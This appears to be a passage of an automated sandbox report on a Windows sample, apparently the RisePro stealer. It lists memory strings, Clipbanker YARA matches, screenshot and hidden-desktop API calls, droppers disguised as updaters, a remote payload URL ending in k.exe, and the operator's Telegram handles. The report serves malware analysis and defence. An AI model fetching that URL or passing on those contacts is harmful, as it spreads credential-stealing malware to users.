Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.3589404399.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/
Source: file.exe, 00000000.00000003.3589404399.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3589404399.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.57.52
Source: file.exe, 00000000.00000003.3589404399.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.57.52
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000002.4548751165.0000000005F30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/:
Source: file.exe, 00000000.00000002.4548751165.0000000005F30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/p
Source: file.exe, 00000000.00000002.4548751165.0000000005F5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3589404399.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2554170461.0000000005F5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2553437350.0000000005F5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe
Source: file.exe, 00000000.00000003.3589404399.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe27
Source: file.exe, 00000000.00000002.4548751165.0000000005F5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2554170461.0000000005F5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2553437350.0000000005F5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exeQn%
Source: file.exe, 00000000.00000002.4548751165.0000000005F5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2554170461.0000000005F5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2553437350.0000000005F5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae:80/wp-content/upgrade/k.exe
Source: file.exe, 00000000.00000002.4545138703.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: file.exe, 00000000.00000003.3589404399.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: file.exe, 00000000.00000002.4533245156.0000000000515000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: file.exe, 00000000.00000003.3589404399.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4545138703.0000000000E9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.57.52
Source: file.exe, 00000000.00000003.3589404399.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.57.52
Source: file.exe, 00000000.00000003.2481232112.000000000613A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2533416931.00000000063A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2477379991.0000000006135000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2525199327.0000000005F6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2528901493.00000000063AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2527411352.00000000063A2000.00000004.00000020.00020000.00000000.sdmp, VkHLTH_m2kErRb6vpA5n.exe, 0000000A.00000003.2493343977.0000000002826000.00000004.00000020.00020000.00000000.sdmp, IQUKpYR1BFFsqw1YWBOv.exe, 00000016.00000003.2543316462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000017.00000003.2553704031.0000000002888000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 0000001D.00000003.2598675933.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 00000020.00000003.2682530694.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 00000023.00000003.2776335477.0000000002822000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.10.dr, IQUKpYR1BFFsqw1YWBOv.exe.0.dr, MSIUpdaterV2.exe0.0.dr String found in binary or memory: https://sectigo.com/CPS0
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://support.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: file.exe, 00000000.00000002.4548516421.0000000005D60000.00000004.00000020.00020000.00000000.sdmp, fAeDYcmqiE_joVxmGjCsOKI.zip.0.dr String found in binary or memory: https://t.me/RiseProSUPPORT
Source: file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.dr String found in binary or memory: https://t.me/risepro_bot
Source: file.exe, 00000000.00000003.3589404399.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot.52
Source: file.exe, 00000000.00000003.3589404399.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botO
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org#
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.6:49713 version: TLS 1.2
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063EC230 SetThreadExecutionState,SetThreadExecutionState,CreateThread,CloseHandle,GetDesktopWindow,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,shutdown,closesocket,SetThreadDesktop,Sleep,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetCurrentThreadId,GetThreadDesktop,BitBlt,DeleteObject,DeleteDC,ReleaseDC,Sleep,GetSystemMetrics,GetSystemMetrics,GetCurrentThreadId,GetThreadDesktop,SwitchDesktop,SetThreadDesktop,Sleep,Sleep,DeleteObject,DeleteDC,ReleaseDC, 0_2_063EC230
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063C9080 OpenDesktopA,CreateDesktopA, 0_2_063C9080

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 35.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 35.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 14.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 42.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 42.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 38.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 38.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 32.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 13.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 13.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 22.2.IQUKpYR1BFFsqw1YWBOv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 22.2.IQUKpYR1BFFsqw1YWBOv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 24.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 24.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 41.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 41.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 29.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 10.2.VkHLTH_m2kErRb6vpA5n.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 10.2.VkHLTH_m2kErRb6vpA5n.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000017.00000002.2556843085.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000017.00000002.2556843085.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000A.00000002.2495381134.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000A.00000002.2495381134.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000E.00000002.2512361549.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000E.00000002.2512361549.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000F.00000002.2512547715.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000F.00000002.2512547715.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000029.00000002.2857457109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000029.00000002.2857457109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000020.00000002.2684473529.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000020.00000002.2684473529.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000023.00000002.2778342634.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000023.00000002.2778342634.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000026.00000002.4532446439.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000026.00000002.4532446439.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000D.00000002.2514737568.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000D.00000002.2514737568.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000016.00000002.2545838500.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000016.00000002.2545838500.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000002A.00000002.2950167796.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000002A.00000002.2950167796.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000018.00000002.2554981113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000018.00000002.2554981113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001D.00000002.2600512204.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001D.00000002.2600512204.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063CC480 CreateProcessAsUserA,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess, 0_2_063CC480
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004E925D 0_2_004E925D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004103C0 0_2_004103C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00496450 0_2_00496450
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C490 0_2_0040C490
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0045A490 0_2_0045A490
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004564A0 0_2_004564A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0045B4B0 0_2_0045B4B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00458520 0_2_00458520
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0043B750 0_2_0043B750
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00438770 0_2_00438770
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0043C800 0_2_0043C800
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004378A0 0_2_004378A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00442940 0_2_00442940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00439A80 0_2_00439A80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00434B20 0_2_00434B20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0042EB90 0_2_0042EB90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0045CC40 0_2_0045CC40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BFC0 0_2_0040BFC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0048E040 0_2_0048E040
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007040BB 0_2_007040BB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00708167 0_2_00708167
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0044C160 0_2_0044C160
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00702158 0_2_00702158
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00490100 0_2_00490100
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00703108 0_2_00703108
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00487270 0_2_00487270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070A227 0_2_0070A227
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070A2BD 0_2_0070A2BD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0047F360 0_2_0047F360
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070A345 0_2_0070A345
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004E03D0 0_2_004E03D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00483470 0_2_00483470
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402410 0_2_00402410
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004944E0 0_2_004944E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00416490 0_2_00416490
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007095CE 0_2_007095CE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004E959F 0_2_004E959F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00709583 0_2_00709583
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402600 0_2_00402600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00472630 0_2_00472630
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00704607 0_2_00704607
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00433740 0_2_00433740
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070076C 0_2_0070076C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00470760 0_2_00470760
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0048F7B0 0_2_0048F7B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004FB84F 0_2_004FB84F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070181F 0_2_0070181F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00471830 0_2_00471830
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070189A 0_2_0070189A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FF968 0_2_006FF968
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FF9CA 0_2_006FF9CA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004FD9FE 0_2_004FD9FE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041F9B0 0_2_0041F9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FFA73 0_2_006FFA73
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00701A03 0_2_00701A03
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00481A30 0_2_00481A30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00708ABB 0_2_00708ABB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00702A96 0_2_00702A96
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004E3B58 0_2_004E3B58
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0044EB90 0_2_0044EB90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004E5B90 0_2_004E5B90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FFC44 0_2_006FFC44
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00704C0B 0_2_00704C0B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004F6CC5 0_2_004F6CC5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FFC82 0_2_006FFC82
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00490E40 0_2_00490E40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0049EE70 0_2_0049EE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418EE0 0_2_00418EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00483EF0 0_2_00483EF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00482FE0 0_2_00482FE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00493FF0 0_2_00493FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063ED540 0_2_063ED540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063CA230 0_2_063CA230
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063C9A10 0_2_063C9A10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063D3B60 0_2_063D3B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063EC990 0_2_063EC990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063E1980 0_2_063E1980
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0640E63B 0_2_0640E63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06421714 0_2_06421714
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063CC760 0_2_063CC760
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0641F43E 0_2_0641F43E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063D24B0 0_2_063D24B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0640E2DC 0_2_0640E2DC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063E72F0 0_2_063E72F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063E4370 0_2_063E4370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0641C010 0_2_0641C010
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063CFE50 0_2_063CFE50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063E8F60 0_2_063E8F60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0640DF9A 0_2_0640DF9A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063E5AB0 0_2_063E5AB0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: Joe Sandbox View Dropped File: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 06406140 appears 51 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00469F00 appears 32 times
Sample file is different than original file name gathered from version info
Source: file.exe Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.2481232112.000000000613A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
